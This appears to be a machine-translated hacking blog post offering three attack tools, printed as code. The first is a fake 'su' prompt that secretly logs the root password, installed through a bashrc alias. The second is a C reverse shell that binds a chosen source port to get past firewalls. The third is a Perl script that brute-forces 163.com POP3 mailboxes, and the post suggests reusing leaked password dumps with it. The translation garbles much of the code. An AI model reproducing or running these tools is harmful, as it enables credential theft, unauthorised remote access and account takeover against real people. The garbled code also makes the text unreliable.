Short and practical Python script for penetration

During the Penetration Process, the tool found is not applicable, and the Code itself is king. The three programs below are suitable tools that cannot be found on the network during penetration. They are short and practical.

1. Record the root password Tool

Root. py

 
 

  
  
#! /Usr/bin/python
  
  
Import OS, sys, getpass, time
  
  
Current_time = time. strftime ("% Y-% m-% d % H: % M ")
  
  
Logfile = "/dev/shm/. su. log" // The password is recorded here.
  
  
# CentOS
  
  
# Fail_str = "su: incorrect password"
  
  
# Ubuntu
  
  
# Fail_str = "su: Authentication failure"
  
  
# For Linux Korea // For centos, ubuntu, and korea, the failure prompt For switching the root user is different
  
  
Fail_str = "su: incorrect password"
  
  
Try:
  
  
Passwd = getpass. getpass (prompt = 'password :');
  
  
File = open (logfile, 'A ')
  
  
File. write ("[% s] t % s" % (passwd, current_time) // intercept the root password
  
  
File. write ('n ')
  
  
File. close ()
  
  
Except t:
  
  
Pass
  
  
Time. sleep (1)
  
  
Print fail_str // print the error message that the root switch fails.
 
 

When the system passes through linux to obtain low permissions and fails to raise permissions, the program will be uploaded and then stored in the directory of A Low-Permission user. add alias su = '/usr/root to bashrc. py'; the password is successfully recorded after the low-Permission user su root. For the password record path, see the script.

2. Set Source Port bounce shell

Penetration into a linux server, the target port is 888 when the anti-connection fails, or 80 still does not work, Ping Baidu, You can ping. There is only one truth. The abnormal server limits only some ports that have already been used as the source port to connect to the outside.

For example, only access data packets on port 80 can be received and data is returned from the source port 80.

Google's program was fruitless. I checked the relevant api and wrote it.

Client-port.c

 
 

  
  
# Include
  
  
# Include
  
  
# Include
  
  
# Include
  
  
# Include
  
  
Void error (char * msg)
  
  
{
  
  
Perror (msg );
  
  
Exit (0 );
  
  
}
  
  
Int main (int argc, char * argv [])
  
  
{
  
  
Int sockfd, portno, lportno, n;
  
  
Struct sockaddr_in serv_addr;
  
  
Struct sockaddr_in client_addr;
  
  
Struct hostent * server;
  
  
Char buffer [256];
  
  
If (argc <3 ){
  
  
Fprintf (stderr, "usage % s hostname port LocalPortn", argv [0]);
  
  
Exit (0 );
  
  
} // Three parameters: Target host, target host port, and local source port
  
  
Portno = atoi (argv [2]);
  
  
Sockfd = socket (AF_INET, SOCK_STREAM, 0 );
  
  
If (sockfd <0)
  
  
Error ("ERROR opening socket ");
  
  
Bzero (char *) & client_addr, sizeof (client_addr ));
  
  
Lportno = atoi (argv [3]);
  
  
Client_addr.sin_family = AF_INET;
  
  
Client_addr.sin_addr.s_addr = INADDR_ANY;
  
  
Client_addr.sin_port = htons (lportno); // you can specify the source port.
  
  
If (bind (sockfd, (struct sockaddr *) & client_addr,
  
  
Sizeof (client_addr) <0)
  
  
Error ("ERROR on binding ");
  
  
Server = gethostbyname (argv [1]);
  
  
If (server = NULL ){
  
  
Fprintf (stderr, "ERROR, no such host ");
  
  
Exit (0 );
  
  
}
  
  
Bzero (char *) & serv_addr, sizeof (serv_addr ));
  
  
Serv_addr.sin_family = AF_INET;
  
  
Bcopy (char *) server-> h_addr,
  
  
(Char *) & serv_addr.sin_addr.s_addr,
  
  
Server-> h_length );
  
  
Serv_addr.sin_port = htons (portno );
  
  
If (connect (sockfd, & serv_addr, sizeof (serv_addr) <0) // connect
  
  
Error ("ERROR connecting ");
  
  
Dup2 (fd, 0 );
  
  
Dup2 (fd, 1 );
  
  
Dup2 (fd, 2 );
  
  
Execl ("/bin/sh", "sh-I", NULL); // execute shell
  
  
Close (fd );
  
  
}
 
 

Usage:

 
 

  
  
Gcc client-port.c-o port
  
  
Chmod + x port
  
  
./Port your IP address your listening port local source port
 
 

Such as./port http://www.91ri.org 80 80

Shell Privilege Escalation successful

Iii. Email brute-force script

At some point, a batch of mailboxes need to be cracked.

Burp163.pl

 
 

  
  
#! /Usr/bin/perl
  
  
Use Net: POP3;
  
  
$ Email = "pop.163.com"; // set the pop server address qq to pop.qq.com.
  
  
$ Pop = Net: POP3-> new ($ email) or die ("ERROR: Unable to initiate .");
  
  
Print $ pop-> banner ();
  
  
$ Pop-> quit;
  
  
$ I = 0;
  
  
Open (fp1, "user.txt ");
  
  
@ Array1 = <fp1>;
  
  
Open (fp2, "pass.txt ");
  
  
@ Array2 = <fp2>; // obtain the email user name and password from the file.
  
  
Foreach $ a (@ array1 ){
  
  
$ U = substr ($ a, 0, length ($ a)-1 );
  
  
$ U = $ u. "@ 163.com ";
  
  
Foreach $ B (@ array2 ){
  
  
$ P = substr ($ B, 0, length ($ B)-1 );
  
  
Print "cracked with". $ u. "-----". $ p. "n ";
  
  
$ I = $ I + 1;
  
  
$ Pop = Net: POP3-> new ($ email) or die ("ERROR: Unable to initiate .");
  
  
$ M = $ pop-> login ($ u, $ p); // try to log on to your mailbox
  
  
If ($ m> 0)
  
  
{
  
  
Print $ u. "------------". $ p. "----". "success". "n ";
  
  
$ Pop-> quit;
  
  
} // Login successful
  
  
Else
  
  
{
  
  
Print $ u. "------------". $ p. "----". "failed". "n ";
  
  
$ Pop-> quit; // Logon Failed
  
  
}
  
  
}
  
  
}
  
  
Print $ I;
 
 

Use the pop server of the mailbox to be cracked to write the following row. The default value is 163 mailbox.

 
 

  
  
$email="pop.163.com"; 
 
 

And then remove the mailbox address after @, such as the lusiyu@163.com removed lusiyu stored in

In the same directory user.txt, save the dictionary to pass.txt.

You will say: Is this a little chicken? In case the mailbox password is complex.

Haha.

Get the data of a small station and use this program to batch test whether the password is an email password.

Well, I didn't say anything.

These three procedures are only for technical research. I am not responsible for any illegal activities by readers.